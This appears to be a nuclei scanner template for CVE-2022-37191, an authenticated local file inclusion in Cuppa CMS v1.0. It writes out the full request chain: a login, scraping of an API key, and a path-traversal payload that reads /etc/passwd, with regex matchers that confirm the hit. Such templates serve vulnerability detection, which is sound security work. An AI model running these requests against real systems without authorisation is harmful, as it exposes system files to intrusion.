nuclei-templates/http/cves/2022/CVE-2022-37191.yaml

70 lines
1.8 KiB
YAML

id: CVE-2022-37191
info:
name: Cuppa CMS v1.0 - Authenticated Local File Inclusion
author: theamanrawat
severity: medium
description: |
The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload.
reference:
- https://github.com/CuppaCMS/CuppaCMS
- https://nvd.nist.gov/vuln/detail/CVE-2022-37191
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2022-37191
cwe-id: CWE-829
metadata:
max-request: 3
verified: true
tags: cve,cve2022,lfi,cuppa,authenticated
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&password={{password}}&language=en&task=login
- |
POST /components/table_manager/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
path=component%2Ftable_manager%2Fview%2Fcu_api_keys
- |
POST /api/index.php HTTP/1.1
Host: {{Hostname}}
key: {{apikey}}
Content-Type: application/x-www-form-urlencoded
function=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body_3
regex:
- "root:[x*]:0:0"
- type: word
part: header_3
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
name: apikey
internal: true
group: 1
regex:
- "<td class='td_key'>(.*?)</td>"